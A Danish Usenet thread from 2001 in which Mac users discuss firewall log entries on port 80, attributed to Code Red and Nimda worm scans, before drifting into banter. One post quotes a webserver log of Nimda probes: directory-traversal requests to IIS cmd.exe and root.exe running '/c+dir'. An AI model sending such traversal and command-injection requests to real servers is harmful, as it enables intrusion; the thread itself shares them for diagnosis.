---

Hej alle :)


Min "Who's There Firewall Advisor" der kan udforske bl.a. Norton
Personal Firewall's logfil, meddeler følgende mange gange, hvis man
kigger under "Allowed" altså tilladte tilslutninger.

Web Sharing Port 80 212.10.15.34 mail.winart.dk

Det er ikke den eneste IP adresse der har været i kontakt med port 80,
blot et eksempel. Og det er altså kun de tilladte forsøg på
tilslutninger jeg snakker om her.

Så er mit spørgsmål:

Er de her "Firewall log analyserings programmer" til mere skade end
gavn? Jeg er f.eks. ret meget sikker på, at jeg aldrig har haft noget
med winart.dk (der er en århusiansk kunskskole, åbenbart?) at gøre.
Og jeg har en rimelig tro på, at selv uden Norton Firewall ville min Mac
være ret sikker.

Men antallet af port-scanninger på Stofanet er gået vildt i vejret her
på det sidste, og så tænker man jo om nogen har lavet noget "Back
Orifice" til Mac (der virker).

Men er der en rimelig fornuftig forklaring på det hele? Jeg mener, hvis
jeg ikke har Web Sharing installeret, såøhh?

Anyway, hvis nogen har nogle tanker vedr. dette så sig til



Mojn, Thomas

---

In article <1ezyafj.vhe8tp19x5omqN%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Anyway, hvis nogen har nogle tanker vedr. dette så sig til

www.winart.dk bruger MS IIS til webservering, så grunden til at den har
besøgt dig, er sandsynligvis, at den er blevet smittet af noget rød kode.

Hvis du ikke kører nogen serverprogrammer eller peer to peer programmer,
så skulle du være sikker.

Helt personligt bruger jeg ikke nogen som helst firewall programmer på
min web/ftp/mail-server, og der har ikke været nogen indbrud.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

In article <newsspam3-D1A614.23005418092001@test.edlich.dk>,
Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Hvis du ikke kører nogen serverprogrammer eller peer to peer programmer,
> så skulle du være sikker.

Det kunne vist misforstås: Du er naturligvis sikker mod code red, selvom
du kører nogen serverprogrammer - rød kode smitter kun MS IIS.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1ezyafj.vhe8tp19x5omqN%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Anyway, hvis nogen har nogle tanker vedr. dette så sig til
>
> www.winart.dk bruger MS IIS til webservering, så grunden til at den har
> besøgt dig, er sandsynligvis, at den er blevet smittet af noget rød kode.

Ahh, og den er så kommet så langt at Norton registrerer den som
"allowed" men ikke mere end det?

> Hvis du ikke kører nogen serverprogrammer eller peer to peer programmer,
> så skulle du være sikker.

Hmm, jeg opdaterede manics.dk med Golive, der har jeg muligvis slået
Norton fra i 5 minutter. Men der er masser af andre IP'er der har fået
et rødt flag af "Who's There" på andre tidspunkter.

P2P, næhhh. Hvilken port sker DCC overførsler fra IRC på, ikke 80 vel?
(ellers har vi foklaringen der :)

Selv om jeg godt nok lige er blevet k-lined ser jeg, hva' fanden har jeg
nu lavet? ... Nå, men det er en helt anden luder, sagde drengen da han
fik en ny mor.

K-lined - det lyder ikke rart!

<http://www2.pacfusion.com/sg/TS/faq/0,1246,116,00.html>

Nå, det kan jo være det ikke er mig, jeg er jo også så flink så hvem
ville banne mig




Mojn, Thomas

---

In article <1ezyi2v.k5yzg91nwmd6N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Ahh, og den er så kommet så langt at Norton registrerer den som
> "allowed" men ikke mere end det?

Den registrerer vel bare at der har været et forsøg på adgang via port
80.

> Hmm, jeg opdaterede manics.dk med Golive, der har jeg muligvis slået
> Norton fra i 5 minutter. Men der er masser af andre IP'er der har fået
> et rødt flag af "Who's There" på andre tidspunkter.

Nu ved jeg ikke hvor detaljeret den logger, men Code Red fylder ret godt
i logfilen fra min webserver, så det er ret sandsynligt at en stor del
af dine flag kommer fra sådanne forespørgsler.

> P2P, næhhh. Hvilken port sker DCC overførsler fra IRC på, ikke 80 vel?
> (ellers har vi foklaringen der :)

Det kan jeg ikke tro. Visse programme kan man selv sætte til hvilken
port de skal bruge - jeg ved ikke om IRC's overførsler en et af dem.

> Nå, det kan jo være det ikke er mig, jeg er jo også så flink så hvem
> ville banne mig

Det kan jeg heller ikke forestille mig

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Nu ved jeg ikke hvor detaljeret den logger, men Code Red fylder ret godt
> i logfilen fra min webserver, så det er ret sandsynligt at en stor del
> af dine flag kommer fra sådanne forespørgsler.

Den logger ganske udemærket (Norton/DoorStop). På under 40, minutter har
jeg fået over 35 port 80 forespørgeslser. Er det code red? Jeg har
aldrig før haft sådan en trafik!
--
Mvh Michael Tysk-Andersen

---

Hej Michael

Det kan godt være CodeRed, men det kan jo også være den nye Nimda, der er på
spil.

mvh. Erik Richard

Michael Tysk-Andersen wrote:

> > Nu ved jeg ikke hvor detaljeret den logger, men Code Red fylder ret godt
> > i logfilen fra min webserver, så det er ret sandsynligt at en stor del
> > af dine flag kommer fra sådanne forespørgsler.
>
> Den logger ganske udemærket (Norton/DoorStop). På under 40, minutter har
> jeg fået over 35 port 80 forespørgeslser. Er det code red? Jeg har
> aldrig før haft sådan en trafik!

--
K.M.L. Denmark by Erik Richard Sørensen, Member of ADC
Edwin Rahrsvej 20.3.03, DK-8220 Brabrand, Denmark
Phone: (+45) 8625 0963, Fax: (+45) 8625 0962 (temporary off)
Mobile phone: (+45) 4082 6109, E-mail: <kml.ers@mail1.stofanet.dk>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Software - For Theological Education - And For Physical Impaired
- Do it The Nisus Way - Nisus Writer, The Best Textprocessor in The World
- Nisus Email, A Revolution In Emailing - Visit: <http://www.nisus.com>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---

Michael Tysk-Andersen <mta@mac.com> wrote:

> Martin Edlich <newsspam3@mail.edlich.dk> wrote:
>
> > Nu ved jeg ikke hvor detaljeret den logger, men Code Red fylder ret godt
> > i logfilen fra min webserver, så det er ret sandsynligt at en stor del
> > af dine flag kommer fra sådanne forespørgsler.
>
> Den logger ganske udemærket (Norton/DoorStop). På under 40, minutter har
> jeg fået over 35 port 80 forespørgeslser. Er det code red? Jeg har
> aldrig før haft sådan en trafik!

Det kan være code red, det kan også være alt muligt andet:
Portscanninger, søgermaskinespiders, fejladdressede browseropkald,
HTTP/Tunnel proxyscanninger, Gnutella scanninger mm.
--
Jesper. »Vi danskere er med vores kristne-lutheranske
kulturarv så forskellige fra muslimerne, at vi må erkende,
at vi ikke kan leve sammen.«
Sven Bergstein, Pens. Oberstløjtnant, medlem af CD

---

In article <1ezzfm1.12hfa27bhzidaN%mta@mac.com>,
mta@mac.com (Michael Tysk-Andersen) wrote:

> Den logger ganske udemærket (Norton/DoorStop). På under 40, minutter har
> jeg fået over 35 port 80 forespørgeslser. Er det code red? Jeg har
> aldrig før haft sådan en trafik!

Med den hyppighed, er det nok Nimda. Et enkelt eksempel på dens angreb,
ser således ud i min logfil:

09/19/01 09:59:00 ERR! 404 195.216.11.216 "www"
:scripts:root.exe 900 900 - "www" 192.168.1.3:80 3 0 /c+dir
404 GET /scripts/root.exe /scripts/root.exe /c+dir "" "" GET
1 "" 195.216.11.216
09/19/01 09:59:00 ERR! 404 195.216.11.216 "www" :MSADC:root.exe
900 900 - "www" 192.168.1.3:80 7 0 /c+dir 404 GET
/MSADC/root.exe /MSADC/root.exe /c+dir "" "" GET 49 ""
195.216.11.216
09/19/01 09:59:00 ERR! 404 195.216.11.216 "www"
:c:winnt:system32:cmd.exe 900 900 - "www" 192.168.1.3:80 8
0 /c+dir 404 GET /c/winnt/system32/cmd.exe
/c/winnt/system32/cmd.exe /c+dir "" "" GET 50 "" 195.216.11.216
09/19/01 09:59:00 ERR! 404 195.216.11.216 "www"
:d:winnt:system32:cmd.exe 900 900 - "www" 192.168.1.3:80 7
0 /c+dir 404 GET /d/winnt/system32/cmd.exe
/d/winnt/system32/cmd.exe /c+dir "" "" GET 66 "" 195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:scripts:..%5c..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe /c+dir "" "" GET 65 ""
195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:_vti_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe 900 900 -
"www" 192.168.1.3:80 1 0 /c+dir 404 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir "" ""
GET 67 "" 195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:_mem_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe 900 900 -
"www" 192.168.1.3:80 7 0 /c+dir 404 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir "" ""
GET 69 "" 195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:msadc:..%5c..:..%5c..:..%5c:..¡..:..¡..:..¡..:winnt:system32:cmd.exe
900 900 - "www" 192.168.1.3:80 7 0 /c+dir 404 GET
/msadc/..%5c../..%5c../..%5c/..¡../..¡../..¡../winnt/system32/cmd.exe
/msadc/..%5c../..%5c../..%5c/..¡../..¡../..¡../winnt/system32/cmd.exe
/c+dir "" "" GET 71 "" 195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:scripts:..¡..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..¡../winnt/system32/cmd.exe
/scripts/..¡../winnt/system32/cmd.exe /c+dir "" "" GET 73 ""
195.216.11.216
09/19/01 09:59:01 ERR! 404 195.216.11.216 "www"
:scripts:..¿/..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..¿/../winnt/system32/cmd.exe
/scripts/..¿/../winnt/system32/cmd.exe /c+dir "" "" GET 74 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..¿Ø..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 7 0 /c+dir 404 GET
/scripts/..¿Ø../winnt/system32/cmd.exe
/scripts/..¿Ø../winnt/system32/cmd.exe /c+dir "" "" GET 75 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..¡ú..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..¡ú../winnt/system32/cmd.exe
/scripts/..¡ú../winnt/system32/cmd.exe /c+dir "" "" GET 76 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..5c..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..5c../winnt/system32/cmd.exe
/scripts/..5c../winnt/system32/cmd.exe /c+dir "" "" GET 77 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..5c..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..5c../winnt/system32/cmd.exe
/scripts/..5c../winnt/system32/cmd.exe /c+dir "" "" GET 78 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..%5c..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe /c+dir "" "" GET 79 ""
195.216.11.216
09/19/01 09:59:02 ERR! 404 195.216.11.216 "www"
:scripts:..%2f..:winnt:system32:cmd.exe 900 900 - "www"
192.168.1.3:80 2 0 /c+dir 404 GET
/scripts/..%2f../winnt/system32/cmd.exe
/scripts/..%2f../winnt/system32/cmd.exe /c+dir "" "" GET 80 ""
195.216.11.216

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Den 19/09/01 16:46 skrev Martin Edlich,newsspam3@mail.edlich.dk

> Med den hyppighed, er det nok Nimda. Et enkelt eksempel på dens angreb,
> ser således ud i min logfil:
>
> 09/19/01 09:59:00 ERR! 404 195.216.11.216 "www"
> :scripts:root.exe 900 900 - "www" 192.168.1.3:80 3 0 /c+dir
> 404 GET /scripts/root.exe /scripts/root.exe /c+dir "" "" GET
> 1 "" 195.216.11.216

Lige for at lære lidt, hvordan ved du at det her er Nimda der er på spil.
Dine logfiler er stort set identiske med mine

Mvh
lars

---

In article <B7CE9CCB.36D1%larskristensen@mac.com>,
Lars Kristensen <larskristensen@mac.com> wrote:

> Lige for at lære lidt, hvordan ved du at det her er Nimda der er på spil.
> Dine logfiler er stort set identiske med mine

Jeg læste lidt om den et eller andet sted, og det den gør er at prøve et
stort antal bagdøre. Fungerer den første bagdør ikke , prøver den den
næste osv. Som du vil kunne se i din logfil, er der 16 forsøg fra hver
IP-adresse.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Lars Kristensen <larskristensen@mac.com> wrote:

> Den 19/09/01 16:46 skrev Martin Edlich,newsspam3@mail.edlich.dk
>
> > Med den hyppighed, er det nok Nimda. Et enkelt eksempel på dens angreb,
> > ser således ud i min logfil:
> >
> > 09/19/01 09:59:00 ERR! 404 195.216.11.216 "www"
> > :scripts:root.exe 900 900 - "www" 192.168.1.3:80 3 0 /c+dir
> > 404 GET /scripts/root.exe /scripts/root.exe /c+dir "" "" GET
> > 1 "" 195.216.11.216
>
> Lige for at lære lidt, hvordan ved du at det her er Nimda der er på spil.
> Dine logfiler er stort set identiske med mine

System Footprint:

http://www.cert.org/advisories/CA-2001-26.html




Mojn, Thomas

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1ezyi2v.k5yzg91nwmd6N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Ahh, og den er så kommet så langt at Norton registrerer den som
> > "allowed" men ikke mere end det?
>
> Den registrerer vel bare at der har været et forsøg på adgang via port
> 80.

Johh, men hvorfor står de forsøg så under ALLOWED og ikke under DENIED?


Mojn, Thomas

---

In article <1f006d7.1a7tz621mkk0w0N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Johh, men hvorfor står de forsøg så under ALLOWED og ikke under DENIED?

Velsagtens fordi det er en korrekt http-forespørgsel, men skal jeg være
ærlig, så aner jeg ikke hvilke kriterier den dømmer på.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f006d7.1a7tz621mkk0w0N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Johh, men hvorfor står de forsøg så under ALLOWED og ikke under DENIED?
>
> Velsagtens fordi det er en korrekt http-forespørgsel, men skal jeg være
> ærlig, så aner jeg ikke hvilke kriterier den dømmer på.

Ahh, den forklaring vil jeg gerne købe. Den lyder fornuftig, og jeg vil
ikke bekymres mere over det. Norton får lov at udføre dens job og så må
det være det



Mojn, Thomas

---

Thomas Boelskifte <engineering@boelskifte.dk> wrote:

> Martin Edlich <newsspam3@mail.edlich.dk> wrote:
>
> > In article <1ezyafj.vhe8tp19x5omqN%engineering@boelskifte.dk>,
> > engineering@boelskifte.dk (Thomas Boelskifte) wrote:
> >
> > > Anyway, hvis nogen har nogle tanker vedr. dette så sig til
> >
> > www.winart.dk bruger MS IIS til webservering, så grunden til at den har
> > besøgt dig, er sandsynligvis, at den er blevet smittet af noget rød kode.
>
> Ahh, og den er så kommet så langt at Norton registrerer den som
> "allowed" men ikke mere end det?
>
> > Hvis du ikke kører nogen serverprogrammer eller peer to peer programmer,
> > så skulle du være sikker.
>
> Hmm, jeg opdaterede manics.dk med Golive, der har jeg muligvis slået
> Norton fra i 5 minutter. Men der er masser af andre IP'er der har fået
> et rødt flag af "Who's There" på andre tidspunkter.
>
> P2P, næhhh. Hvilken port sker DCC overførsler fra IRC på, ikke 80 vel?
> (ellers har vi foklaringen der :)
>
> Selv om jeg godt nok lige er blevet k-lined ser jeg, hva' fanden har jeg
> nu lavet? ... Nå, men det er en helt anden luder, sagde drengen da han
> fik en ny mor.
>
> K-lined - det lyder ikke rart!
>
> <http://www2.pacfusion.com/sg/TS/faq/0,1246,116,00.html>
>
> Nå, det kan jo være det ikke er mig, jeg er jo også så flink så hvem
> ville banne mig

Det kan være fordi din adresse har været anvendt i et smurf- eller
fraggleangreb på den eller de IRC servere der K-Liner dig. Det kræver
ikke din aktive medvirken, men hvis ikke du er pingusynlig på nettet
(hardware firewalls og NetBarrier software firewall kan give dig
pingusynlighed) så kan din maskine bruges til at bounce ICMP pakker fra.

Derudover hvis du har haft en proxyserver kørende på din maskine og der
er en eller anden der er gået igennem den og lavet noget grimt på IRC,
så kan din IP også blive K Lined

--
Jesper.

---

Jesper <triton@titancity.com> wrote:

> Thomas Boelskifte <engineering@boelskifte.dk> wrote:

> > K-lined - det lyder ikke rart!
> >
> > <http://www2.pacfusion.com/sg/TS/faq/0,1246,116,00.html>
> >
> > Nå, det kan jo være det ikke er mig, jeg er jo også så flink så hvem
> > ville banne mig
>
> Det kan være fordi din adresse har været anvendt i et smurf- eller
> fraggleangreb på den eller de IRC servere der K-Liner dig. Det kræver
> ikke din aktive medvirken, men hvis ikke du er pingusynlig på nettet
> (hardware firewalls og NetBarrier software firewall kan give dig
> pingusynlighed) så kan din maskine bruges til at bounce ICMP pakker fra.

AhhhhhHA!

Ja når jeg kigger i loggen efter jeg har været på IRC, så kan jeg godt
se at der er nogen af "vennerne" der har sniffet til mine porte (Edlich,
ingen morsomheder tak :)

Så det er da muligt, jeg er dog un-K-lined igen, uden at have brokket
mig. Sikkert en fejl.

Men NetBarrier siger du, den har jeg brugt førhen. Norton Personal
Firewall kan ikke lave pingusynlighed, eller hur?

Lad os sige at jeg går tilbage til NetBarrier, hvilke ulemper giver
pingusynlighed så. Der er vel en bagside


Mojn, Thomas

---

Thomas Boelskifte <engineering@boelskifte.dk> wrote:

> nogen af "vennerne" der har sniffet til mine porte (Edlich,
> ingen morsomheder tak :)

da forbudet ikke omfatter mig vil jeg tillade mig...

det var nogen "sjove" venner du har, i må være meget tæt på hinanden(s).

--
Venlig hilsen Morten Reippuert Knudsen... nu på iceBook

<icq:131382336>

---

In article <1f007yr.1398s46re5mn5N%reippuert@mac.com>,
reippuert@mac.com (Morten Reippuert Knudsen) wrote:

> da forbudet ikke omfatter mig vil jeg tillade mig...

Diskri<snøft>mination er <snøft> det, ja <snøft>.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f007yr.1398s46re5mn5N%reippuert@mac.com>,
> reippuert@mac.com (Morten Reippuert Knudsen) wrote:
>
> > da forbudet ikke omfatter mig vil jeg tillade mig...
>
> Diskri<snøft>mination er <snøft> det, ja <snøft>.

Du kan da poste under pseudonym.

--
Venlig hilsen Morten Reippuert Knudsen... nu på iceBook

<icq:131382336>

---

In article <1f009g5.xs49kh1tk3ckrN%reippuert@mac.com>,
reippuert@mac.com (Morten Reippuert Knudsen) wrote:

> Du kan da poste under pseudonym.

Det gør jeg da i forvejen. Jeg er min egen hemmelige identitet. Meget
praktisk egentlig - jeg behøver ikke at skifte tøj, der er bare at sige
"taadaa", så er jeg mig selv.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Det gør jeg da i forvejen. Jeg er min egen hemmelige identitet. Meget
> praktisk egentlig - jeg behøver ikke at skifte tøj, der er bare at sige
> "taadaa", så er jeg mig selv.

aha, kaptajn køge... burt reynolds er det så vuffen?

--
Venlig hilsen Morten Reippuert Knudsen... nu på iceBook

<icq:131382336>

---

In article <1f00bg3.5cl4eb5x4urkN%reippuert@mac.com>,
reippuert@mac.com (Morten Reippuert Knudsen) wrote:

> aha, kaptajn køge... burt reynolds er det så vuffen?

Han har det i hvertfald med at stå og humpe op og ned at bare pigeben,
så det skal nok stemme.

Hunden gør forresten noget lignende.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Morten Reippuert Knudsen <reippuert@mac.com> wrote:

> Thomas Boelskifte <engineering@boelskifte.dk> wrote:
>
> > nogen af "vennerne" der har sniffet til mine porte (Edlich,
> > ingen morsomheder tak :)
>
> da forbudet ikke omfatter mig vil jeg tillade mig...
>
> det var nogen "sjove" venner du har, i må være meget tæt på hinanden(s).

Hehehehe uha, det er ikke godt når man klukker som en anden Ellemann
flere minutter i træk. Good one Morten

"tæt på hinandens", ikke efter jeg har fået Airport ... hehe :)


Mojn, Thomas

PS: Har du aldrig set det klip af en på et kontor der - efter chefen går
ud af kontoret - ligger på knæ og sniffer hendes stol. Eller hørt Allan
Olsens "Næsen"? Hmm, nu jeg tænker over det ... hvorfor ved jeg den
slags ting? Bare jeg ikke selv er en latent port-sniffer

---

In article <1f0098r.oxzumhs2dou5N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> hvorfor ved jeg den slags ting?

<rækker_fingeren_op.dat>

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f0098r.oxzumhs2dou5N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > hvorfor ved jeg den slags ting?
>
> <rækker_fingeren_op.dat>

Martin, du _har_ fået go, så kom bar med den ... øhh, vitsen!



Mojn, Thomas

---

In article <1f00b7p.10l7cpf12xe17aN%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Martin, du _har_ fået go, så kom bar med den ... øhh, vitsen!

Må jeg godt beholde tøjet på mens jeg fyrer den af, vitsen altså?
Jeg har ikke lyst til at vise abnormiteten her.

I den formodning at du sparede lidt på e'rne, så vil jeg da bare sige at
Guds (dvs mine) veje er uransagelige, og du åbenbart er
sniffe-fetischist (note: alcohol may improve pronunciation). Årsagen
skal vel findes i din barndom, hvor du blev nægtet at se det svenske
mesterværk "mit liv som hund", da din mor mente du var fjollet nok i
forvejen.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f00b7p.10l7cpf12xe17aN%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Martin, du _har_ fået go, så kom bar med den ... øhh, vitsen!
>
> Må jeg godt beholde tøjet på mens jeg fyrer den af, vitsen altså?
> Jeg har ikke lyst til at vise abnormiteten her.
>
> I den formodning at du sparede lidt på e'rne, så vil jeg da bare sige at
> Guds (dvs mine) veje er uransagelige, og du åbenbart er
> sniffe-fetischist (note: alcohol may improve pronunciation). Årsagen
> skal vel findes i din barndom, hvor du blev nægtet at se det svenske
> mesterværk "mit liv som hund", da din mor mente du var fjollet nok i
> forvejen.

Hmm, m.h.t. min barndom vil en ny "min mening" på min HP snart omhandle
citronfromage, lamper af hår - en mår (rimer endda) og katte, måske
cerutter og L.O. Pølser, en dame der hedder noget sjovt og måske noget
med snørrebånd.

Ser du, jeg var ved at skrive den da du sagde "barndom" så jeg skrottede
det hele, og er ved at samle et sammensurium af sære minder.

Der var en rotte i mit legehus da jeg var 5 ... hvem fanden husker den
slags


Mojn, Thomas

---

In article <1f00ew4.1epwlm31337z46N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Hmm, m.h.t. min barndom vil en ny "min mening" på min HP snart omhandle
> citronfromage, lamper af hår - en mår (rimer endda) og katte, måske
> cerutter og L.O. Pølser, en dame der hedder noget sjovt og måske noget
> med snørrebånd.

Interessant menu, hvad fik i så til dessert?

> Ser du, jeg var ved at skrive den da du sagde "barndom" så jeg skrottede
> det hele,

Nejda, ødelagde jeg et skriv for dig?

> og er ved at samle et sammensurium af sære minder.

Lyder som et større arbejde.

> Der var en rotte i mit legehus da jeg var 5 ... hvem fanden husker den
> slags

Øeh, dig?
Hvordan lugtede den (altså udover med næsen)?

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f00ew4.1epwlm31337z46N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Hmm, m.h.t. min barndom vil en ny "min mening" på min HP snart omhandle
> > citronfromage, lamper af hår - en mår (rimer endda) og katte, måske
> > cerutter og L.O. Pølser, en dame der hedder noget sjovt og måske noget
> > med snørrebånd.
>
> Interessant menu, hvad fik i så til dessert?

En lille hest.

> > Ser du, jeg var ved at skrive den da du sagde "barndom" så jeg skrottede
> > det hele,
>
> Nejda, ødelagde jeg et skriv for dig?

Ja, gudskelov! Tak :)

> > Der var en rotte i mit legehus da jeg var 5 ... hvem fanden husker den
> > slags

> Øeh, dig?
> Hvordan lugtede den (altså udover med næsen)?

Jeg lugtede sgu da ikke til den. Min far "ordnede" den vist nok.


Mojn, Thomas


--
Come Mr. Taliban, tally me bananas!

---

In article <1f021dx.roy15mo7gca8N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Min far "ordnede" den vist nok.

Hmm...

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f021dx.roy15mo7gca8N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Min far "ordnede" den vist nok.
>
> Hmm...

Ja, det spørgsmål holder også mig vågen


Mojn, Thomas



--
Come Mr. Taliban, tally me bananas!

---

In article <1f0251f.1ee2vfnefcclcN%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> > Hmm...
>
> Ja, det spørgsmål holder også mig vågen

Det, og så "hvor blev al min duct-tape af?"?

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Det, og så "hvor blev al min duct-tape af?"?

det kan klares uden duck-tape, bare klem rotten fast i skrivebordskuffen
- det virker i al fald med hamstere.

NB, det er iøvrigt mere effektivt at brækkke vingen på en høne, så den
drejer rundt helt af sig selv...

--
Venlig hilsen Morten Reippuert Knudsen... nu på iceBook

<icq:131382336>

---

Morten Reippuert Knudsen <reippuert@mac.com> wrote:

> NB, det er iøvrigt mere effektivt at brækkke vingen på en høne, så den
> drejer rundt helt af sig selv...

Der er visse hemlighedxer her i livet men bare ikke bør give videre,
dette er et bragt eksempel

--
Mvh/re Jannie Lorantzen (øgenavne)
jonasen (at) it (dot) dk

If I wanted culture, I'd eat yogurt.

---

In article <1f056r6.u4050mh2cupsN%jonasenREMOVE@THISit.dk>,
jonasenREMOVE@THISit.dk (Jan Oksfeldt Jonasen) wrote:

> Mvh/re Jannie Lorantzen (øgenavne)

Var det alt de kunne finde på?

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Var det alt de kunne finde på?

Hmmm nej, men nogle af dem er ikke helt stuerene, så de passer
naturligvis ikke ind i et fint selskab som dette
Der er også klassikeren Jan Pan Skraldespand.

--
Mvh/re Jan Jonasen
jonasen (at) it (dot) dk

If I wanted culture, I'd eat yogurt.

---

In article <1f05bc8.3f2g742xqqicN%jonasenREMOVE@THISit.dk>,
jonasenREMOVE@THISit.dk (Jan Oksfeldt Jonasen) wrote:

> > Var det alt de kunne finde på?
>
> Hmmm nej, men nogle af dem er ikke helt stuerene, så de passer
> naturligvis ikke ind i et fint selskab som dette

